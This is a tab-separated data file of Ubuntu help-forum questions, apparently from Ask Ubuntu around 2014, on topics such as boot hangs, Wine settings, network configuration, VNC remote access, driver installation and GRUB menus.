517034	ubuntu 14.04.1 lts installation issue	i have recently installed ubuntu 14.04.1 lts using pen drive on a freshly assembled home pc . the system hangs during the booting process . i have to switch off the system and restart and reboot plenty of times . eventually after many attempts the systems boots up and throws and internal error pop up again and again . i do not understand why my system hangs midway to bootup and why am i getting this internal error again and again . please help .
517035	c++ debug jump back netbeans and eclipse	all the latest netbean ide and eclipse ide for c++ open some project and then rebuild and debug , it will somehow jump back to somewhere when i press step over , like this ( from 44 to 40 ) : can someone help ? ubuntu 12.04 ,64bits , java 1.7.0_51
517039	how to increase video memory in wine ? ( wine version 1.6.2 )	i 'm trying to run a program ( beamng.drive ) on wine 1.6.2 , and there seems to be a problem . see , here 's the thing : i can actually get it to load most of the way . but just before it would have finished loading the stuff i need , it just crashes . it essentially says something along the lines of : `` d3derr_outofvideomemory , out of video memory , failed to allocate dynamic vb. '' . right around that . from what i 've read , it sounds like i need to increase the video memory , but how exactly do i do that ? i did manage to find this : http : //wiki.winehq.org/usefulregistrykeys but it does n't seem to be terribly clear on how to actually fix certain problems . for example , i do n't have a directx folder in my hkey registry , anywhere . so what do i do now ?
517042	licensing terms query	this is quite non technical question , but please help me with direction . one of our customer who is enterprise ( and quite nontechnical folks ) , is planning to buy a solution from us . this solution can work on linux or windows . we are recommending them to use ubuntu to save cost and great performance . but they are worried about hidden licensing cost/impact if any . ( we have given them ample examples that ubuntu is free to use . but one competing agency which is microsoft shop scaring them , and i am die hard open source fan and do n't want them to win . ) is there terms and condition white paper for ubuntu , mysql available which helps us to prove that ubuntu/linux is free to use in commercial environment also ? ( i know amazon is the best example , but still it did not help ! ) . regards , vr
517045	system monitor not getting started in ubuntu 14.04 lts	the system monitor application is just not getting started in my recently upgraded ubuntu 14.04 lts . even from terminal it is not getting started but giving a message that it does not recognize the command system . can anyone help me ?
517046	uninstall php 5.3 ubuntu 14.04	i recently followed instructions given by agentcool in installing php 5.3 in ubuntu 14.04 . and i have php 5.3.28 as > php php 5.5.9 as > php5 how can i undo these steps and go back to original state with php 5.5.9 ? php 5.5.9 as > php ! had to ask question because ca n't post comments .
517047	installing sql*plus on ubuntu 14.04	i tried installing sql*plus on ubuntu 14.04 by following 1 , 2 and 3 . but after downloading instant client i still facing following error ; sqlplus : command not found i am new to ubuntu , guide me to solve this problem . thanks .
517052	static ip in networkmanager but ifconfig does not show the ip ( ubuntustudio 14.04 )	i am running ubuntustudio 14.04 . i have a development setup where my pc has 2 nics one of which connects to the internet and acquires dhcp ip from the router , while the other ( eth1 ) is used to connect development boards etc . now , on eth1 i have a dhcp server running for that `` development intranet '' and i want to have a static ip address on this interface . the problem is that dhcp server fails to start executing and the reason is that eth1 does not have the ip that i have set through the networkmanager . checking with ifconfig : eth1 link encap : ethernet hwaddr 10 : fe : ed:05:99:21 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i have done the following : sudo vi /etc/networkmanager/networkmanager.conf switched managed to true . tried through networkmanager to setup eth1 , but it is disabled as you can see . i went on to create a new interface based on eth1 , the one you see named as ethernet connection 1. the system does not get ipaddress through network manager , whether i have the cable unplugged , or plugs . by the way , i strongly prefer the former . i wonder if i 'll make my life more difficult if i disable network manager altogether and just write the ipaddress in `/etc/network/interfaces/ file . it is a desktop after all . have i missed something in order to make networkmanager assign the static ip permanently from boot to shutdoown ? ? thank you
517053	problem in code block installation in ubuntu 14.04	whenever i try to install code block using my ubuntu software center , i receive a message `` requires installation of untrusted packages '' with detail ( codeblocks codeblocks-common libcodeblocks0 libwxbase2.8-0 libwxgtk2.8-0 ) . whatever i choose between 'ok ' an 'repair ' option it never works . in short , i am not able to install code block in my laptop . please help ... . i use sony vaio e series in which windows 8 was preinstalled , but now i 'm using ubuntu 14.04 .
517056	key combination to switch between an application 's windows in all of viewports	alt-` is used to switch between an application 's windows in the current viewport in unity . is there another key combination to switch between an application 's windows in all of viewports ? i do not want to change default behaviour of alt-` , which is switching between an application 's windows in the current viewport . i am using ubuntu 14.04 and unity .
517058	what is a secure and reliable alternative to skype ?	i 've been browsing the internet for quite a while on the search for an alternative to skype . since i 'm looking for a cross-platform program , i chose jitsi for a start but found that it works quite unreliable ( e.g . shuts down when receiving a call ) and lacks some technical sophistication as well ( e.g . produces echos , stops transmission for seconds during a call ) . thus it 's not what i 'm looking for . is there some program you can recommend ( linux - linux/linux - windows ) ? i 'd really like to avoid using skype as a last resort .
517059	can not mount windows 98 se share over ssh to ubuntu 14.04	i am in a ssh session to ubuntu 14.04 and i am trying to mount a windows 98se share using the following command : sudo mount -t cifs //192.168.0.2/uniserv /tmp/uniserv/ -o sec=lanman , servern=uniplus1 in response ubuntu asks me for a root password for the share : password for root @ //192.168.0.2/uniserv : why is the share not mounting and why am i being asked for a root password ?
517060	i updated to ubuntu 14.04 but now it does not show any files in home and also terminal	i updated to ubuntu version 14.04 first it was showing blank screen but after running some codes now it opens but does not show any files in home folder it does not even fetch terminal
517062	how to share folder from host to guest lubuntu in vbox ?	i 've shared folder in host ( ubuntu 14.04 ) and guest ( mint 13 ) but when tried same procedure with host ( ubuntu 14.04 ) and guest ( lubuntu ) i ca n't find the shared folder . the procedure : created a folder with sharing enabled ( in host ) added it in vbox's selected os ( with auto-mount ) started the guest os , using sudo nautilus /media opened the file manager where the /media folder contains mounted shared folder .
517064	ssh is disconnecting when tacacs+ is enabled	i am using ubuntu 12.04 and the openssh-server version : 1:5.9p1-5ubuntu1.29 . i 'm using a remote tacacs+ server for authentication and authorization . when i login through ssh , tacacs+ authentication and authorization works fine and i 'm given a pty . however if accounting is enabled ( logging the commands i type on the external tacacs+ server ) , whenever i type any command , i 'm immediately disconnected , even after successful authentication and authorization . if accounting is disabled , then ssh does n't disconnect . ssh gives the following error code : received disconnect from 172.24.1.159 error code : 11 ( disconnected by application ) . i believe my /etc/pam.d/system-auth and /etc/pam.d/sshd files are configured properly . does my /etc/ssh/sshd_conf file need some modification or anyone else has faced this issue and knows some workaround ? any suggestion would be truly helpful .
517067	how to wake xubuntu desktop from sleep	i am using xubuntu 14.04 and it is connected to a tv via vga . when i leave the computer for a while the screen goes blank ( i 'm assuming it 's gone to sleep ) my problem is that when i move the mouse or press a letter on the keyboard the display just wo n't wake up ? ? ( it could be the tv ? ? ) any help greatly appreciated
517071	ubuntu 14.04 background acting weird	i have installed ubuntu 14.04 from scatch and after the second or third reboot , my desktop background `` hangs '' whenever i get pass the login screen . my wallpaper is gone , replaced by an image of the login screen , or some kind of `` in-between '' image from the login to the desktop wallpaper . also , i ca n't change the wallpaper from apearance menu . i do n't know how to explain it better , so here are two example pics from different logins : ( in this picture , the system is completely booted , it stays like that ) for now it only seems to be a minor bug , performance does n't seem affected . thank you all
517072	how do i remap capslock to shift exactly in kubuntu 14.04 ?	my shift keys do not work and i used xmodmap before , but it seems reseting ( .xinitrc file not triggering ) . i tried advanced keyboard settings , but there is no right choice of capslock behaviour ( i can not enter '' № ; % : ? * сharacters ) . i know about gnome tweak tool , but i am trying to solve this with kde tools . if it helps , i use aser russian layout keyboard .
517075	upgrade 14.04 with errors and shows red sign on top	i upgraded to ubuntu 14.04 but it shows a red symbol on the top and gives error message in function update e : unknown error : < type exceptions.type error > upgrade manager or any other file is not present
517078	any volume control applet for openbox ?	folks , environment : ubuntu 14.04 minimal + openbox . it is a development box . audio is based on alsa . i love the lightweightness of openbox . i do n't even use tint2 as i feel it does n't add much value . for the system tray , i just use a lightweight app called docker . the only thing i am missing is a lightweight volume control applet that can go into the system tray . i saw an application called volume icon that might fit the bill : http : //softwarebakery.com/maato/volumeicon.html however , am i not sure if it is being actively developed . i am wondering if you have a suggest for a volume control applet that is lightweight and is developed somewhat actively . if needed , i can stoop down to using tint2 . regards , peter
517080	vino-server : local connection works but not remote connection	i would like to remotely take control over ma grandma 's pc , where i installed lubundu 14.04.1 . this is not a duplicate of this other question ( i want to avoid teamviewer + see below ) . i configured vino preferences ( allowed other users to see and control computer , asked to confirm every access to the computer , tried with/without asking for a password , configured upnp to automatically redirect ports , always display icon in notification tray ) . in french : link to picture i also used ufw to open 5900 . and defined a nat rule that redirects 5900 to my grandma 's computer . i test everything at my grandma 's home , my client is on my computer ( remmina , 192.168.1.18 ) and the server is on hers ( vino-server , 192.168.1.17 ) then to test , i run : /usr/lib/vino/vino-server -- sm-disable so , if i connect locally from the client , it works . on server side , vino-server says : edith @ tonantzin : ~ $ /usr/lib/vino/vino-server -- sm-disable ( vino-server:3435 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion 'global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed 28/08/2014 09:37:21 autoprobing tcp port in ( all ) network interface 28/08/2014 09:37:21 listening ipv6 : // [ : : ] :5900 28/08/2014 09:37:21 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:37:21 autoprobing selected port 5900 28/08/2014 09:37:21 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:37:21 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 28/08/2014 09:37:21 listening ipv6 : // [ : : ] :5900 28/08/2014 09:37:21 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:37:21 clearing securitytypes 28/08/2014 09:37:21 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:37:21 clearing securitytypes 28/08/2014 09:37:21 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:37:21 advertising authentication type : 'no authentication ' ( 1 ) 28/08/2014 09:37:21 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 28/08/2014 09:37:21 listening ipv6 : // [ : : ] :5900 28/08/2014 09:37:21 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:37:21 clearing securitytypes 28/08/2014 09:37:21 clearing authtypes 28/08/2014 09:37:21 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:37:21 advertising authentication type : 'no authentication ' ( 1 ) 28/08/2014 09:37:21 advertising security type : 'no authentication ' ( 1 ) 28/08/2014 09:37:39 [ ipv4 ] got connection from client pc10.home 28/08/2014 09:37:39 other clients : 28/08/2014 09:37:39 client protocol version 3.7 28/08/2014 09:37:39 advertising security type 18 28/08/2014 09:37:39 advertising security type 1 28/08/2014 09:37:39 client returned security type 18 28/08/2014 09:37:40 advertising authentication type 1 28/08/2014 09:37:41 client returned authentication type 1 28/08/2014 09:37:48 pixel format for client pc10.home : 28/08/2014 09:37:48 8 bpp , depth 8 28/08/2014 09:37:48 true colour : max r 7 g 7 b 3 , shift r 0 g 3 b 6 28/08/2014 09:37:48 rfbprocessclientnormalmessage : ignoring unknown encoding type -131072 28/08/2014 09:37:48 enabling newfbsize protocol extension for client pc10.home 28/08/2014 09:37:48 rfbprocessclientnormalmessage : ignoring unknown encoding type -131071 28/08/2014 09:37:48 rfbprocessclientnormalmessage : ignoring unknown encoding type -131070 28/08/2014 09:37:48 rfbprocessclientnormalmessage : ignoring unknown encoding type -131069 28/08/2014 09:37:48 rfbprocessclientnormalmessage : ignoring unknown encoding type -309 at 09:37:39 , a connection comes from pc10.home ( local ) . at 09:37:48 , on server side , i allowed the connection and vino-server displays the next messages while on client side , the server 's screen shows up . here 's netstat result : edith @ tonantzin : ~ $ netstat -anp | grep 5900 tcp 0 0 0.0.0.0:5900 0.0.0.0 : * listen 3484/vino-server tcp 0 0 192.168.1.17:5900 192.168.1.18:45041 established 3484/vino-server tcp6 0 0 : ::5900 : : : * listen 3484/vino-server edith @ tonantzin : ~ $ but if i try to connect remotely ( same setting in the client , except that i put the box 's ip ( 109.215 ... ... ) instead of local ip ; no ssh connection so far , just to test ) . in this case , the server does not answer , though it seems it 'heard ' something ( check at 09:34:22 ) : edith @ tonantzin : ~ $ /usr/lib/vino/vino-server -- sm-disable ( vino-server:3371 ) : eggsmclient-critical ** : egg_sm_client_set_mode : assertion 'global_client == null || global_client_mode == egg_sm_client_mode_disabled ' failed 28/08/2014 09:34:04 autoprobing tcp port in ( all ) network interface 28/08/2014 09:34:04 listening ipv6 : // [ : : ] :5900 28/08/2014 09:34:04 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:34:04 autoprobing selected port 5900 28/08/2014 09:34:04 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:34:04 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 28/08/2014 09:34:04 listening ipv6 : // [ : : ] :5900 28/08/2014 09:34:04 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:34:04 clearing securitytypes 28/08/2014 09:34:04 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:34:04 clearing securitytypes 28/08/2014 09:34:04 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:34:04 advertising authentication type : 'no authentication ' ( 1 ) 28/08/2014 09:34:04 re-binding socket to listen for vnc connections on tcp port 5900 in ( all ) interface 28/08/2014 09:34:04 listening ipv6 : // [ : : ] :5900 28/08/2014 09:34:04 listening ipv4 : //0.0.0.0:5900 28/08/2014 09:34:04 clearing securitytypes 28/08/2014 09:34:04 clearing authtypes 28/08/2014 09:34:04 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:34:04 advertising authentication type : 'vnc authentication ' ( 2 ) 28/08/2014 09:34:04 clearing securitytypes 28/08/2014 09:34:04 clearing authtypes 28/08/2014 09:34:04 advertising security type : 'tls ' ( 18 ) 28/08/2014 09:34:04 advertising authentication type : 'vnc authentication ' ( 2 ) 28/08/2014 09:34:04 advertising security type : 'vnc authentication ' ( 2 ) 28/08/2014 09:34:22 [ ipv4 ] got connection from client livebox.home 28/08/2014 09:34:22 other clients : 28/08/2014 09:34:46 [ ipv4 ] got connection from client livebox.home 28/08/2014 09:34:46 other clients : 28/08/2014 09:34:46 livebox.home at 09:34:22 a connexion comes from livebox.home ( seems to be from the routeur , so not from local pc ) , but nothing else happens ( no dialog to allow client to connect ) . after 24 seconds more , at 09:34:46 , i try to connect another time from the client , and one can see there that another client is already 'connected ' . same result from netstat , except that the connection comes from the routeur 's ip , and not from a local address : edith @ tonantzin : ~ $ netstat -anp | grep 5900 tcp 0 0 0.0.0.0:5900 0.0.0.0 : * listen 3484/vino-server tcp 0 12 192.168.1.17:5900 192.168.1.1:57233 established 3484/vino-server tcp6 0 0 : ::5900 : : : * listen 3484/vino-server edith @ tonantzin : ~ $ can anyone tell if i missed something anywhere ?
517082	apt-get remove does not remove	after i install , then remove a package , the application is still present : $ sudo apt-get install dhcp3-server reading package lists ... done building dependency tree reading state information ... done note , selecting 'isc-dhcp-server ' instead of 'dhcp3-server' the following packages were automatically installed and are no longer required : libindicate-gtk3 libindicate5 python-gst0.10 python-indicate python-twisted-words use 'apt-get autoremove ' to remove them . suggested packages : isc-dhcp-server-ldap the following new packages will be installed : isc-dhcp-server 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . need to get 762 kb of archives . after this operation , 2,138 kb of additional disk space will be used . get:1 http : //se.archive.ubuntu.com/ubuntu/ trusty/main isc-dhcp-server amd64 4.2.4-7ubuntu12 [ 762 kb ] fetched 762 kb in 0s ( 3,544 kb/s ) preconfiguring packages ... selecting previously unselected package isc-dhcp-server . ( reading database ... 437078 files and directories currently installed . ) preparing to unpack ... /isc-dhcp-server_4.2.4-7ubuntu12_amd64.deb ... unpacking isc-dhcp-server ( 4.2.4-7ubuntu12 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... setting up isc-dhcp-server ( 4.2.4-7ubuntu12 ) ... generating /etc/default/isc-dhcp-server ... isc-dhcp-server start/running , process 18678 isc-dhcp-server6 stop/pre-start , process 18732 processing triggers for ureadahead ( 0.100.0-16 ) ... $ sudo apt-get remove dhcp3-server [ sudo ] password for gauthier : reading package lists ... done building dependency tree reading state information ... done note , selecting 'isc-dhcp-server ' instead of 'dhcp3-server' the following packages were automatically installed and are no longer required : libindicate-gtk3 libindicate5 python-gst0.10 python-indicate python-twisted-words use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . $ dhcpd internet systems consortium dhcp server 4.2.4 copyright 2004-2012 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ unable to create icmp socket : operation not permitted ca n't open /var/lib/dhcp/dhcpd.leases for append . why does dhcpd stay ? how can i remove it for real ? ( purge did not manage to remove the application either ( of course , but at least i tried ) . the application was not installed before . )
517088	error : aborted ( core dumped )	i want to convert modis hdf files into a netcdf format in ubuntu 14.04 . i have not compiled the nco operators with large file size capability and i am getting the following error : ncks : nc4file.c:2696 : nc4_open : assertion `0 ' failed . aborted ( core dumped ) i have used these commands for performing the conversion : ~ $ ncpdq -- hdf_upk -p xst_new mod05_l2.a2000243.2000.005.2006265220542.hdf modis.nc ~ $ ncks -- hdf4 /home/nghajarnia/mod05_l2.a2000243.2000.005.2006265220542.hdf /home/nghajarnia/modis.nc what must i do ?
517091	sometimes left mouse button acting like right , and coursor moving without input	after some recent updates ( beginning of last week or so ) two problem appeared . i try to find solution or determine if i should rapport it as a bug . i'am by no means linux expert , so any help with determining what we have here will be appreciated : system : lenovo t420 ubuntu 14.04.1 lts problem : sometimes ( i can not find any pattern ) left mouse button starts acting like right is supposed to , and right mouse button do n't work at all . sometimes ( again , i can not find any pattern ) cursor is moving slowly without my input mostly to the upper-right corner of the screen , but not always . both problems appeared when i was using generic usb mouse , but persists even when i am using only touch-pad or logitech m185 wireless mouse . workaround : switching to another terminal ( alt+ctrl+fx ) and going back to regular session ( alt+ctrl+f7 ) seems to fix problem for a seemingly random amount of time . logs : i do n't know what kind of information is needed , so just suggest what kind of logs/commands output would be useful in diagnosing problem , and i will provide it asap .
517093	convert.im6 : unable to open image `xxx ' : permission denied @ error/blob.c/openblob/2638	i just tried converting several different images into a pdf file using the 'convert ' command in a terminal , but when i did so , it returned : convert.im6 : unable to open image 'xxx.pdf ' : permission denied @ error/blob.c/openblob/2638 where 'xxx.pdf ' represents my output pdf file name . of course , if i do it as root -- that is to say , sudo convert -- the operation goes through without a hitch . so my question , since i know some of you might probably say i 'm an idiot for not thinking about doing the sudo act , is : why is the convert command only available for root , instead of regular users ? and is there any way i can change that ?
517094	where to get latest stable mesa ?	atm the only choice we got is between mesa which ships with ubuntu ( it 's outdated before release ) or one from oibag ppa which is latest git development branch ( very unstable ) . what about latest stable mesa ? there are huge changes in drivers for amd with each mesa release , so i wondering how can i get it ( atm latest stable is 10.3-rcx ) without compiling everything myself ( which would propably result in broken system ) ?
517097	problem installing gcc compiler	i tried to install gcc compiler because i want to learn programming i have an old computer 1gb ram so i installed an older version of ubuntu ( 10.04 ) and its working faster than before but when i try to install gcc package by writing sudo apt-get install gcc but the following text appear : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gcc so i said maybe the problem is that my version of ubuntu is too old so i wrote in the terminal sudo get-apt upgrade but this also appear to me reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and i tried also sudo apt-get update but many lines appear and the last one was e : some index files failed to download , they have been ignored , or old ones used instead and i noticed also that this version of ubuntu do n't have a graphical package manager so .
517100	can i implement a saas infrastructure with juju ?	my aim is to implement software as a service using cloud computing . can we use juju for implementation of software as a service ? we can deploy mysql and wordpress using juju . but i want to install other applications ( e.g matlab etc ) on my server and want to give access for those applications to client .
517102	ubuntu 14.04 freezes !	i installed ubuntu 14.04 lts 64bit on my pc . after i 've installed nvidia drivers ( recommended ) to solve the problem of the cursor that vanishes , ubuntu freezes randomly when i 'm working , i mean that the system does n't react to my actions except when i press ctrl+alt+f1 and then ctrl+alt+f7 , with this solution everything returns to normal . i 've narrowed down the cause to these 3 : the drivers do n't work correctly i was wrong to install ubuntu on an ext4 partition the swap partition is too relevant to the ram ( when i write in terminal cat /proc/sys/vm/swappiness it reports a value of 60 ) . i do n't want to install another distro before i 've tried everything possible ! asus x53s series , nvidia geforce 610m 2gb dedicated , intel core i7 ( 2,20 ghz ) 64bit , ram 4gb .
517116	cuda installation concern	i have installed cuda on ubuntu 14.04 , and midway through , it had suggested in one or more of the console messages , that i can expect some surprise concerning my gpu / monitor / display driver function after the next reboot . my question is , how would i mitigate finding myself with a headless box once i next reboot my ubuntu desktop on which this installation took place . preferably mitigate before even booting , otherwise , what to do after booting .
517117	ubuntu 14.04 - lightdm and unity optimal configuration	what i 'm using : sonyvaio vpcef2e1e ( with 4gb ram and ati mobility radeonâ˘ hd 4250 ) in the old days i never had issue with the graphics . i had to fight sometimes to add drivers to the graphic card but ubuntuworked well , very well i had to say taking account of some older laptops i 've used . since i began to see unity , i began to have a lot of problems with my laptops , usually i follow some tutorials to deactivate unity , or set compiz to minimal configuration because the graphics were running badly . i 'm tired about following tutorials/guides about activate or deactivate this or that option ... i would like to have some knowledge about what 's going on with unity , compiz , lightdm ... i 've tried to found any information about those kind of things but i only find 2 kind of things : easy tutorials to follow them as sheeps in a flock very complex explanations about ubuntu and it 's graphical environment questions can anybody tell me about any good book to teach myself in this kind of things ? is there any kind of bible tutorial that i 'm loosing ? is there any kind of configuration that makes unitydash do n't crash ? ( i have drivers on my laptop , everything works well except this ) also would like anybody to point me in a good direction to learn about the display manager lightdm i know there is a lot of information , i 've made a lot of research but although i 've been using linux for some years , i 'm really noob about graphic issues , used to follow tutorials to fix concrete issues during this years , but i 've never develop my understanding about it . i 'm just looking for some good information to read about .
517118	bluetooth not communicate ( ubuntu 14.04 , asus f5n )	error while copying “photo0384.jpg” . there was an error copying the file into /media/** . another operation in progress http : //oi62.tinypic.com/2hx6r5y.jpg
517121	ltsp client boots on busybox	i 've installed an ltsp server on my linux desktop 12.04 ( virtual machine ) , set all the necessary network settings . now i created a thin client using virtualbox , booted ( after starting up the server obviously ) , the client connects to the ip address , boots , but all i see is a busybox . shoudl n't there be a desktop ? ? i tried installing an ltsp server on a 10.04 desktop , this time the client booted in a busybox with this error : error : failed to connect to nbd server . i followed this guide : http : //www.thefanclub.co.za/how-to/how-create-ubuntu-1104-x64-ltsp-server-32bit-thin-clients except for the client i created a `` host only '' nic instead of a bridged one . i 've really been stuck with this for a long time , could somebody please help ?
517122	how to port ubuntu touch to xperia go ?	i want to install a ubuntu touch on my xperia go smartphone , but i ca n't find any tutorial.. can anyone create tutorial how to install or port it ? thanks !
517123	unable to install nvidia drivers on ubuntu 14.04 on my lenovo z570	i have nvidia geforce gt520m graphics card on my laptop . unfortunately i am unable to use it on my laptop running ubuntu 14.04 . i tried installing drivers from settings > additional drivers . but i am unable to succeed in that . after selecting the proprietary driver from the list , as i click on `` apply changes '' , the progress bar moves a little bit and gets stuck there . i patiently waited for an hour , but nothing happened there after . kindly help ; i am unexperienced with ubuntu .
517124	apturl and firefox 3.0	so ... another stupid question ( i 've got a bunch of 'em , lol ) on a previous thread , i was informed that i might give firefox the apturl ability because i had had trouble downloading from getdeb website with it but not with chromium ( that 's how my last question got solved , actually ) i followed the hint and got myself to https : //help.ubuntu.com/community/apturl to do just that , only to find out that i had no idea on how to follow the ( seemingly straight-forward ) explanations . here they are : `` **apturl works by default with firefox if it is installed from the ubuntu repositories if you use a version of firefox that you did n't install from the repositories , you need to enable the apturl in your browser , using the procedure below . this mechanism applies to all recent browsers based on firefox , such as seamonkey , swiftfox , iceweasel , etc . follow the instructions on the mozillazine wiki : ( http// ) kb.mozillazine.org/register_protocol # firefox_3.5_and_above click on this link apt : //mplayer , and in the `` application launch '' windows , click on the `` choose '' button and : click on file system , and the /usr/bin directory then on the apturl file . do n't forget to enable `` remember my choice '' and validate . ** `` those informations are okay to follow . what i 'm having problems with is the info at this website http : //kb.mozillazine.org/register_protocol # firefox_3.5_and_above it tells me to replace `` foo '' with the protocol you 're specifying '' what is the protocol i 'm specifying ? apturl ? or what ? then it tells me to `` replace foo with the protocol you 're specifying and /path/to/app with the path to the application you want to run '' what is the application i want to run in the case of giving firefox the apturl ability ? the path to firefox ? or what ? i hope my question is clear ... thank you to anyone who can enlighten me on this ! fred
517125	kernel module build fails on 14.04 : sys/types.h : no such file or directory	i 'm unable to build a kernel module in ubuntu 14.04 . this is the make file i use : $ cat makefile obj-m += my_module.o all : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) modules clean : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) clean and this is the output of 'make ' : $ make make -c /lib/modules/3.13.0-34-generic/build m=/home/user/location modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-34-generic' cc [ m ] /home/user/location/my_module.o /home/user/location/my_module.c:2:23 : fatal error : sys/types.h : no such file or directory # include < sys/types.h > ^ compilation terminated . the file sys/types.h exists : /usr/include/x86_64-linux-gnu/sys/types.h and a test program which includes it compiles : $ cat test.c # include < sys/types.h > # include < stdio.h > int main ( ) { printf ( `` test\n '' ) ; return 0 ; } $ gcc -o test test.c $ i looked at several posts and made sure i have libc6-dev and build-essential installed . any ideas ?
517134	how to view recently opened media files ?	in windows we have an option to view recently opened media files as my recent documents , i was wondering does there exists something like that in ubuntu ? via terminal or via gui ?
517135	comparing 2 text files ( registry entries for wine prefixes )	thanks to a glitch from wine ( while changing my wine prefix windows version ) wine thinks it 's dealing with a windows 95 , windows xp and windows 7 prefix at the same time . this obviously confuses wine terribly and this leads to deep thoughts about what it should do with such an all inclusive prefix . problem is that wine gets so distracted by these deep thought that it starts to use 100 of my cpu whenever it has to deal with the prefix and does n't appear to be doing anything ( it 's probably stuck in a loop of ever changing windows versions ) . since i did n't want to deal with such deep and philosophical thoughts i just made a new prefix . now my question is : is there an easy way to compare the registry files of my new wine prefix with the old one and fix ( some of ) the differences ? ?
517136	list of ubuntu versions with corresponding linux kernel version	is there a list of ubuntu versions with default corresponding linux kernel versions somewhere ? i would specifically like to know the most recent version of ubuntu that still used linux kernel 2.x .
517137	default adapter for internet connection	i would like to ask , how can i solve my situation . we use this laptop with ( x ) ubuntu 14.04 at work . at certain situations , we need to be connected to the internet through 3g usb modem and at the same time , connected through ethernet ( without the internet ) to access devices . the problem is , that system is looking for the internet on ethernet . 3g usb modem works , internet works , but when i plug in ethernet , 3g internet stops working . is there anyway to tell ubuntu to look for the internet on this 3g usb modem when it 's connected and also let me work with other devices connected through ethernet at the same time ?
517144	i ca n't access the grub menu during bootup of ubuntu server 14	i can not access the grub menu when booting up ubuntu server . i have tried the options in the following three threads : how to enable grub menu on ubuntu 12.04 server ? i ca n't get grub menu to show up during boot how to get to the grub menu at boot-time ? after trying the various options , only difference that has been made was changing the grub_timeout=0 to 10 . this meant that after i typed sudo reboot , the black , ( or dark coloured ! ) screen stays for about ten seconds . i have pressed shift , ( both right and left ) , held down shift ( both right and left ) , pressed and held space , and pressed and held escape , none appear to bring up the grub menu . my grub bootloader file looks like this : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=false grub_timeout=10 grub_distributor='lsb_release -i -s 2 > /dev/null || echo debian' grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' '' grub_badram= '' 0x1234567 , 0xfefefefe , 0x89abcdef , 0xefefefef '' grub_terminal=console grub_gfxmode=640x480 grub_disable_linux_uuid=true grub_disable_recovery= '' true '' grub_init_tune= '' 480 440 1 '' the bigger black lines are the ones that have been commented out , ( still trying to get the hang of the editor here ! ) i have tried uncommenting the console line , the graphics line , and changing the grub_hidden_timeout_quiet to false , and a combination of these factors . also my computer does n't beep when the black screen ( which is where i believe the grub screen is i just cant see it ! ) any help ?
517145	has the behavior of links to wine apps changed since 14.04 ?	since the update to 14.04 lts my links to wine programs have been acting strange . it 's like the file is run from the location of the link and not from its installed folder . opening a link from inside the install folder works perfectly but opening the same link outside the install folder results in errors . of course i can make a .desktop file to replace the links but i was just wondering if it has indeed changed or not since it used to work just fine before the update . or is it just wine that 's trying something new ? can anyone shine some light on the subject ?
517147	how to get the host machine hostname from the virtualmachine ?	i installed ubuntu 13.04 virtual machine on ubuntu 13.04 host machine . is there a way to get the name of the host machine ( hostname ) using a script.sh program ?
517148	how can i boot ubuntu alongside windows 8.1	i just have installed ubuntu 14.04 from the usb successfully on my asus n46 running windows 8.1 , but after i restart my laptop there is no ubuntu in the boot and my laptop run into windows 8.1. how can i solve it ?
517149	could not apply the stored configuration for monitors - ubuntu 14.04 freezes	i downloaded updates to my pc ; which was on ubuntu 12.04 lts ; and the next thing i know it 's upgrading ubuntu . now it 's upgraded to ubuntu 14.04 lts ; and when i login ; it displays the following message : could not apply the stored configuration for monitors . none of the selected modes were compatible with the possible modes : trying modes for crtc442 then it lists several different attempts with different resolutions ; but , then it just freezes ; and it no longer responds to my mouse clicks ; so , i ca n't do anything and end up having to shutdown the pc . i booted up to my bootable ubuntu 12.04 lts disk , and , first used the , `` try ubuntu '' to see if i could reconfigure the monitor ; but , no luck ; so , i ended up re-installing 12.04 lts desktop ; but , now , i ca n't get it to use any other monitor but `` laptop '' with a screen resolution of 640x480 , and i 'm using as my monitor ; my tv , which is an emerson flatscreen . help !
517151	anomaly in switching windows on different viewports in unity	my sample setting is as follows : viewport1 contains following window : firefox a viewport2 contains following windows : firefox b gedit when viewport1 is shown and firefox a has gained focus after gedit , i can switch to gedit via a single key stroke alt-tab . however , after i press alt-tab again , firefox b is switched . how can i achieve to switch to firefox a without extra key stroke ? i am using ubuntu 14.04 and unity . edit 1 : bias alt-tab to prefer windows on the current viewport of ccsm conflicts with switch between windows on all workspaces of unity tweak tool . is bias alt-tab to prefer windows on the current viewport of ccsm rendered to be useless ?
